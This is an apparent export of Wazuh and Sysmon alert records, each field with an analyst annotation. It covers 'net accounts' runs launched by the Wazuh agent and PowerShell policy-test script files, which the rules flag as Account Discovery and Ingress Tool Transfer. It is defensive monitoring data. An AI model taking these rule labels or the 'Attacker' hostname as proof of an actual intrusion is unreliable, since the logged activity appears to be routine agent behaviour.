data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 3244 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Discovery activity executed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92031 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 14 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534520.2210874 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:41:57.9354713Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 288475 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:41:57.928
ProcessGuid: {94294ddc-be35-680a-0b0c-000000000e00}
ProcessId: 12868
Image: C:\Windows\SysWOW64\net1.exe
FileVersion: 10.0.26100.1 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net1.exe
CommandLine: C:\WINDOWS\system32\net1 accounts
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
ParentProcessGuid: {94294ddc-be35-680a-090c-000000000e00}
ParentProcessId: 15044
ParentImage: C:\Windows\SysWOW64\net.exe
ParentCommandLine: net.exe accounts
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:41:57.928 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be35-680a-0b0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12868 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: C:\\WINDOWS\\system32\\net1 accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-be35-680a-090c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 15044 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: net.exe accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Discovery activity executed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92031 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 15 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534520.2215933 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:41:58.0123233Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 288479 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:41:58.002
ProcessGuid: {94294ddc-be36-680a-0c0c-000000000e00}
ProcessId: 9516
Image: C:\Windows\SysWOW64\net.exe
FileVersion: 10.0.26100.1882 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net.exe
CommandLine: net.exe accounts
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00}
ParentProcessId: 3244
ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe
ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe"
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:41:58.002 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be36-680a-0c0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9516 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1882 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: net.exe accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 3244 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Discovery activity executed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92031 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 16 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534520.2221166 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:41:58.1535209Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 288481 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:41:58.147
ProcessGuid: {94294ddc-be36-680a-0e0c-000000000e00}
ProcessId: 13260
Image: C:\Windows\SysWOW64\net1.exe
FileVersion: 10.0.26100.1 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net1.exe
CommandLine: C:\WINDOWS\system32\net1 accounts
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
ParentProcessGuid: {94294ddc-be36-680a-0c0c-000000000e00}
ParentProcessId: 9516
ParentImage: C:\Windows\SysWOW64\net.exe
ParentCommandLine: net.exe accounts
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:41:58.147 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be36-680a-0e0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13260 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: C:\\WINDOWS\\system32\\net1 accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-be36-680a-0c0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 9516 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: net.exe accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell process created an executable file in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92205 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534521.2226221 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:41:58.9659338Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 288487 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:41:58.965
ProcessGuid: {94294ddc-be36-680a-0f0c-000000000e00}
ProcessId: 10392
Image: C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Windows\SystemTemp\__PSScriptPolicyTest_4x1dyjil.bnk.ps1
CreationUtcTime: 2025-04-24 22:41:58.962
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:41:58.965 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be36-680a-0f0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10392 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\SystemTemp\\__PSScriptPolicyTest_4x1dyjil.bnk.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:41:58.962 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell process created an executable file in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92205 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 3 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534526.2228926 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:42:04.2531417Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 288648 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:42:04.251
ProcessGuid: {94294ddc-be36-680a-0f0c-000000000e00}
ProcessId: 10392
Image: C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Windows\SystemTemp\__PSScriptPolicyTest_ux5z0ejr.gmd.ps1
CreationUtcTime: 2025-04-24 22:42:04.251
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:42:04.251 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be36-680a-0f0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10392 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\SystemTemp\\__PSScriptPolicyTest_ux5z0ejr.gmd.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:42:04.251 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534530.2231631 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
